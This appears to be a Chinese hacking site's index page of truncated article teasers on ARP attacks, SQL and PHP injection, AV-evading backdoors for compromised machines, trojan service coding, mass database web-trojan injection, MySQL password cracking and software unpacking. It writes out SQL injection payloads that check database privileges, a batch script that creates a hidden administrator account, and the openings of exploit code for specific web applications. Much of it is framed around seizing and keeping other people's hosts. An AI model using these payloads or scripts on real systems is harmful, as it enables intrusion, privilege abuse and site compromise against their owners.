arp攻击:巧论ARP攻击防制思路方法的虚虚实实
来源:安全中国ARP欺骗/攻击反复袭击是近来网络行业普遍了解现象随着ARP攻击不断升级区别解决方案在市场上流传但是笔者最近发现有些方案从短期看来似乎有效实际上对于真正ARP攻击发挥不了作用也降低局域网工作效率Qno侠诺技术服务人员接到很多用户反应说有些ARP防制思路方法很容易操作和实施但经过实际深入了解后发现长期效果都不大 对于ARP攻击防制Qno侠诺技术服务人员建议最好思路方法是先踏踏实实把... [阅读全文]
跨站攻击:图文详解 WINRAR的自解压跨站攻击漏洞
来源:安全中国听许多人说WINRAR自解压格式文件在安装界面上可以跨站笔者亲自测试了下这个不能单单说是跨站了本来还以为是个新出漏洞呢原来是WINRAR本身缺陷在其界面上可以支持任何HTML代码详细我们看下文 首先创建个自解压格式文件来到下图界面 图1 然后切换到“高级”这个选项卡我们看到个“自解压选项”图2 点击“自解压选项”来到如下图所示 图3 我们在“自解压文件窗口中... [阅读全文]
常用注入命令:我常用的一些注入命令 方便一下大家
作者:草哲我记性不好所以把常用注入代码记录下来有点乱但对我来说还算很有用希望大家也会喜欢! //看看是什么权限 and 1=(Select IS_MEMBER(’db_owner’)) And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库权限 and 1= (Select ... [阅读全文]
十进制转二进制算法: 2进制转十进制 十进制转 2进制的算法
来源:安全中国 2进制转十进制,十进制转 2进制算法 十进制转 2进制: 用2辗转相除至结果为1 将余数和最后1从下向上倒序写 就是结果 例如302 302/2 = 151 余0 151/2 = 75 余1 75/2 = 37 余1 37/2 = 18 余1 18/2 = 9 余0 9/2 = 4 余1 4/2 = 2 余0 2/2 = 1 余0 故 2进制为1001011... [阅读全文]
最新安全软件Software推荐:我是007 v2.22加密软件Software
给大家介绍款免费又功能强大加密软件Software——我是007它支持Vista操作系统采用多种加密思路方法,支持加密文本、文件、文件夹,提供文件粉碎和文件透镜功能支持独立加密:只要有密码,加密后文件就可以在没有安装本软件Software电脑上解密本软件Software具有其它同类软件Software所没有“幻影”功能,支持图片幻影和文件幻影,可以得到奇妙加密效果本软件Software采用国际流行... [阅读全文]
创建脚本文件:脚本自动创建帐户密码脚本自动创建帐户密码
来源:安全中国@echo off net user lanye lanye /add net user localgroup administrators lanye /add ________________________________________________________________________________ 其实很简单吧! 这里@echo off可以写也可以不写.作用... [阅读全文]
因式分解:分解后门查核心——打造杀毒软件SoftwarePASS的后门
来源:安全中国在安全观念日益强化今天想得到台属于自己肉鸡是不易如果说管理员发现了自己留在肉鸡上后门账号而导致肉鸡丢失话那就是世间最痛苦事了相信大家都不会希望这种事情发生在自己身上吧!这时候用什么后门来控制肉鸡就成为最让人头疼问题而好后门关键就在于是否会被查杀下文起来看看如何打造出自己免查杀后门吧! Superdoor3.0这款软件Software大家都用过或者听过吧?它只有个可执行文件本身很小... [阅读全文]
mysql修改密码:修改破解MYSQL密码思路方法大全
思路方法 使用phpmyadmin这是最简单了修改mysql库user表不过别忘了使用PASSWORD 思路方法 2 使用mysqladmin这是前面声明个特例 mysqladmin -u root -p password mypasswd 输入这个命令后需要输入root原密码然后root密码将改为mypasswd 把命令里root改为你用户名你就可以改你自己密码了 当然如果你mys... [阅读全文]
ssh端口号:Linux系统下更改SSH的端口号
来源:安全中国操作系统linux和Unix都适用: 改/etc/ssh/sshd_config将里面Port改为新端口比如10022然后 kill -HUP `cat /var/run/sshd.pid` 就行了 现有连接自己不会断kill -HUP `cat /var/run/sshd.pid` 只是HUP监听那个已经建立连接(区别 pid)不会断 然后你在现有账号下面exit在用新... [阅读全文]
网络攻击检测:模拟入侵者检测网络攻击
随着信息技术发展越来越多人都喜欢用计算机办公发邮件建设自己个人站点公司建立自己企业站点政府也逐渐采取了网上办公更好为人民服务银行和证券机构也都开始依托互联网来进行金融和股票交易但是随着方便同时也同时带来了新些计算机网 我直从事病毒分析网络攻击响应相关工作这次应好朋友邀请帮忙配合去协查几台服务器我们来到了某XXX驻地首先进行例行检查经过了1天左右时间检查其中用到了些专用设备也包含自主编写工具以及第... [阅读全文]
例子:对某ASC加密网马的破解和利用
来源:安全中国QQ群中有人在叫卖网马网友花钱获得个共享给我让我看看于是有了下面这篇文章 1.网马初探 在浏览器中打开网马这个网马功能比较简单主要用来上传功能更强网马比较有特色是可以在目标网页上传漏洞自己修改修改配置查看该网马源代码发现该网马加密了很明显是用ASC加密(图1) 2.网马分析 虽然该网马核心功能代码进行ASC加密了但其框架目了然其代码及其解释如下: script lan... [阅读全文]
icesword:Icesword 是如何列出隐藏进程
by:wuyanfeng icesword 是通过 PspCidTable 这个表来遍历进程 PspCidTable 是个没有被 ntoskrnl.exe 导出这就涉及到如何定位 PspCidTable 问题icesword 是通过搜索特征串方式定位 PspCidTalbe. PspCidTable 是个 HANDLE_TALBE 结构. PsLookupProcessByProcessI... [阅读全文]
反入侵:一次简单的反入侵测试
文章: 唐不狐某日小弟正在肉鸡上snfe正巧赶上某淫在扫我肉鸡sa弱口令先做了个ipsec阻断了对方对我肉鸡扫描对方ip直接在嗅探器里得到了:61.19.***.***.查了下是泰国人妖直接ie里面键入地址还有个站 初步地揣测:该ip是某淫肉鸡用来扫别人 偶接下来很风骚地揣测那个某淫是不是也这样扫扫sa弱口令就日下这鸟鸡鸡呢?于是telnet 61.19.***.*** 1433 嘿端口开着本地查... [阅读全文]
plink.exe:PuTTY自带的Plink.exe绕过http劫持
来源:安全中国俗话说网民分两种种是上Internet种是上Intranet能上Internet网民绕墙都很有套恰好今天sonic问到ssh代理问题这里就发个利用PuTTY绕墙/开代理办法理论上说支持ssh version2远程登录主机可以当成台socks5代理服务器PuTTY图形化界面也可以配置出个代理但是那个用鼠标点击不自动PuTTY完整版自带PLINK.exe可以完美做这个事情命令是:PLIN... [阅读全文]
跨站脚本注入:跨站式SQL注入窍门技巧全攻略
来源:安全中国第节、SQL注入般步骤首先判断环境寻找注入点判断数据库类型这在入门篇已经讲过了其次根据注入参数类型在脑海中重构SQL语句原貌按参数类型主要分为下面 3种:(A) ID=49 这类注入参数是数字型SQL语句原貌大致如下:Select * from 表名 where 字段=49注入参数为ID=49 And [查询条件]即是生成语句:Select * from 表名 where 字段=49... [阅读全文]
vbs脚本:一个扩展dir命令的vbs脚本
‘CMD下dir好像没法列出从某段时间到某段时间文件所以写了这个小东东 Arg=Wscript.Arguments If Arg.Count=0 then Wscript.echo chr(9)&chr(9)&space(4)&”Xdir v0.1″ Wscript.echo “” Wscript.echo chr(9)&”cscript dir.vbs path time1 time2 ext... [阅读全文]
推荐:SSClone非ARP会话劫持原理分析
来源:安全中国前两天买过期杂志上看到款软件Software刚开始还没注意后来就恨自己杂志买晚了(今年3月份黑客防线)那个神奇软件Software就像我标题上说叫SSClone解释起来就是:Switch Session Clone也就是“交换机会话克隆”(纯字面翻译纯~ )这个软件Software有什么用?其特点就是可以不通过传统ARP欺骗思路方法来实现局域网内会话监听、劫持、复制等操作(其实这个软... [阅读全文]
加壳脱壳:Armadillo 2.5x 加壳的Konvertor 3.13脱壳
来源:安全中国Armadillo 2.5x 加壳Konvertor 3.13脱壳 crack by fwnl 软件Software介绍说明:是个图片、音乐、文字及影音格式文件转换它总共可以转换135种文件格式包含25种音乐格式、4种影音格式、105种图片格式及1种文字格式 破解工具:trw2000,Import REConstructor v1.4.2+ ,winhex10.45, Pedi... [阅读全文]
armadillo:Armadillo变换IAT的修复
来源:安全中国思路方法: 1.修改跳转避开IAT加密(见有关介绍) 2.用ImprtREC得到所有列表,并save tree. 3.把同dll所有API组合起来(任意顺序),建立个正常IAT.然后根据同dllAPI组合顺序建立个变换后在IAT中偏移表,每个API对应2字节偏移. 4.在入口根据同dllAPI组合顺序在IAT偏移表,重新变换处理成为个不连续IAT. 思路方法 2: 1.修... [阅读全文]
利用管理员的粗心捡肉鸡!
来源:华夏黑客联盟 作者:职业色狼前几天借朋友台肉鸡有天又上去看了下发现这台肉鸡桌面上有个FlashFXPFlashFXP是功能强大FXP/FTP软件Software,融合了些其他优秀FTP软件Software优点,如像CuteFTP样可以比较文件夹,支持彩色文字显示;像BpFTP支持多文件夹选择文件,能够缓存Cache文件夹;像LeapFTP样外观界面,甚至设计思路也差相仿佛.支持文件夹 (带子... [阅读全文]
googlehack:google-hack 的新表单
Exploit Code : ############################################ Powered by Com Endeavors(Real Estate)Emlak.NET SQL injection##############################################AUTHOR : S@BUN#####HOME : http://... [阅读全文]
木马编程DIY的系统服务
对系统服务管理几乎是目前木马必不可少功能比如神气儿、上兴远程控制等都提供了此项服务要是我们能给自己编写木马也加上这个功能看着也不赖哦好啦废话不多说下面开始干活!我们木马要实现效果如图1和图2所示 取得配置权限 SC_HANDLE scm; 枚举基本服务信息 BOOL EnumServicesStatus( 枚举详细服务信息 BOOL QueryServic... [阅读全文]
armadillo:用OD脱DEDE的Armadillo 1.xx - 2.xx壳
来源:安全中国前言: 前段时间破个Delphi用到DeDe但提示输入密码我哪有?SHIT!只好拿它来开刀开工!正好有关Armadillo文章较少来篇凑个热闹不当的处请指正 第步、跳过调试器检查: 先IsDebuggerPresent插件隐藏OD然后载入DEDE忽略所有异常 F9运行提示有Debugger运行点击OK后退出看看在什么地方可以跳过NAG故点击前BP DestroyWindow然... [阅读全文]
最近比较流行的数据库挂马
作者:茄子宝以前说过趋势挂马事件MS这个挂马思路方法已经流行了很久从去年就大规模开始了在网上可以搜到很多痕迹SQL语句如下:用游标遍历所有表里如下数据类型字段然后UPDATE挂马(全部是允许写入字段)xtype=99 ntextxtype=35 textxtype=231 nvarcharxtype=167 varchar———————YD分割——————————–DECLARE @T varch... [阅读全文]
sqlinjection:OBlog Sql Injection Vulnerability
官方已经修正该漏洞–+= www.nspcn.org =+––+ OBlog (tags.asp) Remote SQL Injection Exploit +––++–#Author: Whytt & Tr4c3[at]126[dot]com#版权所有:http://www.nspcn.org & [BK瞬间群] & Whytt#漏洞文件ta... [阅读全文]
加壳脱壳:简单脱壳-Armadillo360标准加壳的记事本程序
【破解作者】 csjwaman 【作者邮箱】 [email protected] 【使用工具】 OD110Bb,LordPE,ImprotREC16FFI30 【破解平台】 Win9x/NT/2000/XP 【软件Software名称】 Armadillo360标准加壳win98记事本 【下载地址】 本地下载 【软件Software介绍】 Armadillo360标准加壳win98记... [阅读全文]
头皮针注射技巧:PHP注射基础 经验 窍门技巧 3方面汇总篇
来源:安全中国PHP注射基础 经验 窍门技巧 3方面汇总篇 第讲:判断有没注射点 这个很简单我们最常用就是看到页面格式为:index.php?id=2这样地址我们知道PHP经常是和MYSQL数据库起用在MYSQL数据库中定存在个表比如ting_table我们提交上面地址时候般上这样处理: 1、用GET或者POST取我们提交id=1把这个值传给个变量:$id. 2、查询:select * fr... [阅读全文]
armadillo:有关双进程Armadillo标准壳的脱法
来源:安全中国昨天看了csjwoman那个双进程标准壳NOTEPAD.EXE说真开始还真不知如何下手既不能用脱COPYMEMII(它没有用内存写入)思路方法也不能简单套用以前脱标准壳思路方法(它还是有子进程)后来仔细参考了下mysqladm文章试玩armadillo3.50a点心得体会 有了点启发(最近从他这篇脱文中学到东西可不少)下面谈谈如何脱这种双进程标准壳 最近很懒不愿写东西所以也就不讲什么... [阅读全文]
fuzzer:Web暴力破解–我用wvs fuzzer
Writer: demonalex[at]dark2s[dot]org讲到WEB暴力破解通过大家都会用小榕溯雪但并不是所有WEB破解溯雪都是应付自如(不要说我说小榕他老人家坏话)最近工作关系碰到个网管型设备WEBPORTAL需要做WEB破解看看HTML源码: …script language=javascriptfunction login_send{var f, p, page, url, o... [阅读全文]
armadillo脱壳机:Armadillo 3.6主程序脱壳
工具:OllyDBG1.1汉化版;LordPE 操作系统:WIN2K 目标:Armadillo.exe(3.6主) 最近大家对Armadillo 3.6脱研究有所升温有标准加壳还有CopyMemII+Debug模式加壳等等于是本人也凑个热闹:来个其主脱文较的他们区别点是:是主脱壳难度大点; 2是不用其它辅助dump工具(初步脱壳没有修复) 、寻找OEP并Dump进程 用OllyD... [阅读全文]
